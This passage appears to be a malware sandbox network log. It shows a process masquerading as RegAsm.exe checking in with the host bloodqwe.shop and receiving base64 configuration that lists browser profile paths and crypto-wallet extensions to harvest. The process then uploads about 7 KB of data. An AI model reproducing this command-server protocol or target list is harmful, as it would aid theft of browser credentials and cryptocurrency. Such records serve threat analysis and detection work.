2024-09-28 03:24:15 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 36 43 34 35 41 31 30 42 39 41 32 39 31 39 33 31 34 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 66 61 30 66 63 37 37 31 33 66 36 36 32 35 62 66 38 37 34 66 39 34 37 62 63 66 33 64 66 35 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 2d 2d 0d 0a Data Ascii: ------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="hwid"A96C45A10B9A291931458-a33c7340-61ca------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="build_id"ffa0fc7713f6625bf874f947bcf3df53------BAKEBFBAKKFCBGDHDGHD--
2024-09-28 03:24:15 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:24:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95g1fSjtKkp%2BeXaM5t7T%2BddFFTMDciOoq5tZsTfYu4VH4ZVasbleX1VWBpTrgqxJ5TtiXhDr7WCxX9zWEukiWydp2ZIoAkWnBVFMaaZ9NYWEyU5Y0ouOo%2FBIApqYY6vV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09e93dc798ce0-EWR
2024-09-28 03:24:15 UTC	64	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 31 61 34 32 33 38 63 31 62 39 62 35 66 36 34 35 38 36 61 31 36 66 64 35 61 31 32 66 63 30 30 32 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a Data Ascii: 3a1\|1\|1\|1\|1a4238c1b9b5f64586a16fd5a12fc002\|1\|1\|1\|0\|0\|50000\|1
2024-09-28 03:24:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49750	172.67.167.90	443	2656	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:24:16 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBF Host: bloodqwe.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:24:16 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 61 34 32 33 38 63 31 62 39 62 35 66 36 34 35 38 36 61 31 36 66 64 35 61 31 32 66 63 30 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 66 61 30 66 63 37 37 31 33 66 36 36 32 35 62 66 38 37 34 66 39 34 37 62 63 66 33 64 66 35 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="token"1a4238c1b9b5f64586a16fd5a12fc002------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="build_id"ffa0fc7713f6625bf874f947bcf3df53------EGCGHCBKFCFBFHIDHDBFCont
2024-09-28 03:24:17 UTC	540	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:24:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJjzjAHUi6LkDRUFgSmtmuhn%2F2050%2BlKXb5VtFEJdABAW2%2BKnXug9Ph4QtZcvR727fPFuRexJt1qFxVKYBcnCkSLPnKicUsOH5FKCl3L%2BJD7F1ONDj25fZGDsuRrRDxL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09e9b2b9b726e-EWR
2024-09-28 03:24:17 UTC	829	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE
2024-09-28 03:24:17 UTC	730	IN	Data Raw: 58 45 31 70 59 33 4a 76 63 32 39 6d 64 46 78 46 5a 47 64 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 49 45 4a 6c 64 47 46 38 58 45 31 70 59 33 4a 76 63 32 39 6d 64 46 78 46 5a 47 64 6c 49 45 4a 6c 64 47 46 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 52 57 52 6e 5a 53 42 45 5a 58 5a 38 58 45 31 70 59 33 4a 76 63 32 39 6d 64 46 78 46 5a 47 64 6c 49 45 52 6c 64 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 4d 32 4d 43 42 43 63 6d 39 33 63 32 56 79 66 46 77 7a 4e 6a 42 43 63 6d 39 33 63 32 56 79 58 45 4a 79 62 33 64 7a 5a 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 Data Ascii: XE1pY3Jvc29mdFxFZGdlIFN4U1xVc2VyIERhdGF8Y2hyb21lfE1pY3Jvc29mdCBFZGdlIEJldGF8XE1pY3Jvc29mdFxFZGdlIEJldGFcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBEZXZ8XE1pY3Jvc29mdFxFZGdlIERldlxVc2VyIERhdGF8Y2hyb21lfDM2MCBCcm93c2VyfFwzNjBCcm93c2VyXEJyb3dzZXJcVXNlciBEYXR
2024-09-28 03:24:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49751	172.67.167.90	443	2656	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:24:17 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHD Host: bloodqwe.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:24:17 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 61 34 32 33 38 63 31 62 39 62 35 66 36 34 35 38 36 61 31 36 66 64 35 61 31 32 66 63 30 30 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 66 61 30 66 63 37 37 31 33 66 36 36 32 35 62 66 38 37 34 66 39 34 37 62 63 66 33 64 66 35 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="token"1a4238c1b9b5f64586a16fd5a12fc002------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="build_id"ffa0fc7713f6625bf874f947bcf3df53------BFIDGDAKFHIEHJKFHDHDCont
2024-09-28 03:24:18 UTC	534	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:24:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJvsAeFpjHaD4l3eq7koMCSj2xlyBYskQoM6n11md200OI1TGHRs6tXEKLw4dje3zLGJUfuGPGbg63Rs9UojNfuDNmwsWHgBky0c0m32VBC21q04iN8b%2BrWB2GGh4Jx3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09ea1f9a37cf4-EWR
2024-09-28 03:24:18 UTC	835	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb
2024-09-28 03:24:18 UTC	1369	IN	Data Raw: 47 78 6c 64 48 77 78 66 47 74 77 5a 6d 39 77 61 32 56 73 62 57 46 77 59 32 39 70 63 47 56 74 5a 6d 56 75 5a 47 31 6b 59 32 64 6f 62 6d 56 6e 61 57 31 75 66 44 46 38 4d 48 77 77 66 46 52 6c 63 6e 4a 68 58 31 4e 30 59 58 52 70 62 32 35 38 4d 58 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 77 78 66 47 52 74 61 32 46 74 59 32 74 75 62 32 64 72 5a 32 4e 6b 5a 6d 68 6f 59 6d 52 6b 59 32 64 6f 59 57 4e 6f 61 32 56 71 5a 57 46 77 66 44 46 38 4d 48 77 77 66 45 46 31 63 6d 39 58 59 57 78 73 5a 58 52 38 4d 58 78 6a 62 6d 31 68 62 57 46 68 59 32 68 77 63 47 35 72 61 6d 64 75 61 57 78 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 Data Ascii: GxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYWNoa2VqZWFwfDF8MHwwfEF1cm9XYWxsZXR8MXxjbm1hbWFhY2hwcG5ramduaWxkcGRta2Fha2Vqbmhh
2024-09-28 03:24:18 UTC	1369	IN	Data Raw: 77 78 66 48 42 77 59 6d 6c 69 5a 57 78 77 59 32 70 74 61 47 4a 6b 61 57 68 68 61 32 5a 73 61 32 52 6a 62 32 4e 6a 59 6d 64 69 61 33 42 76 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 4d 48 78 69 61 47 64 6f 62 32 46 74 59 58 42 6a 5a 48 42 69 62 32 68 77 61 47 6c 6e 62 32 39 76 59 57 52 6b 61 57 35 77 61 32 4a 68 61 58 77 78 66 44 46 38 4d 48 78 48 51 58 56 30 61 43 42 42 64 58 52 6f 5a 57 35 30 61 57 4e 68 64 47 39 79 66 44 42 38 61 57 78 6e 59 32 35 6f 5a 57 78 77 59 32 68 75 59 32 56 6c 61 58 42 70 63 47 6c 71 59 57 78 71 61 32 4a 73 59 6d 4e 76 59 6d 78 38 4d 58 77 78 66 44 46 38 56 48 4a 76 62 6d 6c 31 62 58 77 78 66 48 42 75 62 6d 52 77 62 47 4e 69 61 32 46 72 59 33 42 73 61 32 70 75 62 32 78 6e 59 6d 74 6b 5a Data Ascii: wxfHBwYmliZWxwY2ptaGJkaWhha2Zsa2Rjb2NjYmdia3BvfDF8MHwwfEF1dGhlbnRpY2F0b3J8MHxiaGdob2FtYXBjZHBib2hwaGlnb29vYWRkaW5wa2JhaXwxfDF8MHxHQXV0aCBBdXRoZW50aWNhdG9yfDB8aWxnY25oZWxwY2huY2VlaXBpcGlqYWxqa2JsYmNvYmx8MXwxfDF8VHJvbml1bXwxfHBubmRwbGNia2FrY3Bsa2pub2xnYmtkZ
2024-09-28 03:24:18 UTC	1369	IN	Data Raw: 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 39 77 5a 6d 64 6c 62 47 31 6a 62 57 4a 70 59 57 70 68 62 57 56 77 62 6d 31 73 62 32 6c 71 59 6e 42 76 62 47 56 70 59 57 31 68 66 44 46 38 4d 48 77 77 66 45 35 70 5a 32 68 30 62 48 6c 38 4d 58 78 6d 61 57 6c 72 62 32 31 74 5a 47 52 69 5a 57 4e 6a 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59 58 77 78 66 44 42 38 4d 48 78 46 59 33 52 76 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 4a 6e 61 6d 39 6e 63 47 39 70 5a 47 56 71 5a 47 56 74 5a 32 39 76 59 32 68 77 62 6d 74 74 5a 47 70 77 62 32 4e 6e 61 32 68 68 66 44 Data Ascii: oYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHwxfG9wZmdlbG1jbWJpYWphbWVwbm1sb2lqYnBvbGVpYW1hfDF8MHwwfE5pZ2h0bHl8MXxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHwxfGJnam9ncG9pZGVqZGVtZ29vY2hwbmttZGpwb2Nna2hhfD
2024-09-28 03:24:18 UTC	738	IN	Data Raw: 64 57 31 38 4d 58 78 6a 61 57 39 71 62 32 4e 77 61 32 4e 73 5a 6d 5a 73 62 32 31 69 59 6d 4e 6d 61 57 64 6a 61 57 70 71 59 32 4a 72 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 31 72 63 47 56 6e 61 6d 74 69 62 47 74 72 5a 57 5a 68 59 32 5a 75 62 57 74 68 61 6d 4e 71 62 57 46 69 61 57 70 6f 59 32 78 6e 66 44 46 38 4d 48 77 77 66 45 4a 68 59 32 74 77 59 57 4e 72 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 46 6d 62 47 74 74 5a 6d 68 6c 59 6d 56 6b 59 6d 70 70 62 32 6c 77 5a 32 78 6e 59 32 4a 6a 62 57 35 69 63 47 64 73 61 57 39 6d 66 44 46 38 4d 48 77 77 66 46 52 76 62 6d 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 4d 58 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c Data Ascii: dW18MXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHwxfG1rcGVnamtibGtrZWZhY2ZubWthamNqbWFiaWpoY2xnfDF8MHwwfEJhY2twYWNrIFdhbGxldHwxfGFmbGttZmhlYmVkYmppb2lwZ2xnY2JjbW5icGdsaW9mfDF8MHwwfFRvbmtlZXBlciBXYWxsZXR8MXxvbWFhYmJlZmJtaWl
2024-09-28 03:24:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49752	172.67.167.90	443	2656	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:24:18 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJECFIECBFIDGDAKFH Host: bloodqwe.shop Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:24:18 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 61 34 32 33 38 63 31 62 39 62 35 66 36 34 35 38 36 61 31 36 66 64 35 61 31 32 66 63 30 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 66 61 30 66 63 37 37 31 33 66 36 36 32 35 62 66 38 37 34 66 39 34 37 62 63 66 33 64 66 35 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------CGIJECFIECBFIDGDAKFHContent-Disposition: form-data; name="token"1a4238c1b9b5f64586a16fd5a12fc002------CGIJECFIECBFIDGDAKFHContent-Disposition: form-data; name="build_id"ffa0fc7713f6625bf874f947bcf3df53------CGIJECFIECBFIDGDAKFHCont
2024-09-28 03:24:19 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:24:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gQc8NiJcYw%2FazcProzw7h25bMIFyq3w4Br0LlMMuVDdTML2YjpPvcFpNP2645S8pzatMMI3y8hhxujBkzD7%2B75fJjfQ4gG6VuFC99amWvfNXb6oz6XXBpjDl%2FGQDXryG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09ea94e3a0cc2-EWR
2024-09-28 03:24:19 UTC	114	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
2024-09-28 03:24:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49753	172.67.167.90	443	2656	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:24:19 UTC	181	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKF Host: bloodqwe.shop Content-Length: 7025 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:24:19 UTC	7025	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 61 34 32 33 38 63 31 62 39 62 35 66 36 34 35 38 36 61 31 36 66 64 35 61 31 32 66 63 30 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 66 61 30 66 63 37 37 31 33 66 36 36 32 35 62 66 38 37 34 66 39 34 37 62 63 66 33 64 66 35 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="token"1a4238c1b9b5f64586a16fd5a12fc002------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="build_id"ffa0fc7713f6625bf874f947bcf3df53------AKFIDHDGIEGCAKFIIJKFCont
2024-09-28 03:24:20 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:24:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kMtKIdETKI9hMQRJrMHcfnQWw53%2BOJQ0KhEnG858RP4HhrdYCA3qhkckRA9y%2FZVhKzDRpOElgSJuUxzQxrWaeGugMna11QBYKs9EE27qkOQO5I2I%2FG7oDunraZjz2rOy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09eb13d7b8c1e-EWR
2024-09-28 03:24:20 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-09-28 03:24:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49754	172.67.167.90	443	2656	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:24:20 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKF Host: bloodqwe.shop Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:24:20 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 61 34 32 33 38 63 31 62 39 62 35 66 36 34 35 38 36 61 31 36 66 64 35 61 31 32 66 63 30 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 66 61 30 66 63 37 37 31 33 66 36 36 32 35 62 66 38 37 34 66 39 34 37 62 63 66 33 64 66 35 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="token"1a4238c1b9b5f64586a16fd5a12fc002------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="build_id"ffa0fc7713f6625bf874f947bcf3df53------AKFIDHDGIEGCAKFIIJKFCont
2024-09-28 03:24:21 UTC	546	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:24:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y973Kl7Hj45X2CBRsV9bggrFxgF8WR2yBwM0R9OWze57cE3%2Fjki9w4G6Ji2%2B3KsI2nIn24e0uZd6V%2FKv%2BTQYoZ2bExN%2FBrlRY46QfGERIj3ifPwsPk29%2Bd5M89I%2FNDxQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09eb788530f3f-EWR
2024-09-28 03:24:21 UTC	10	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a Data Ascii: 5block
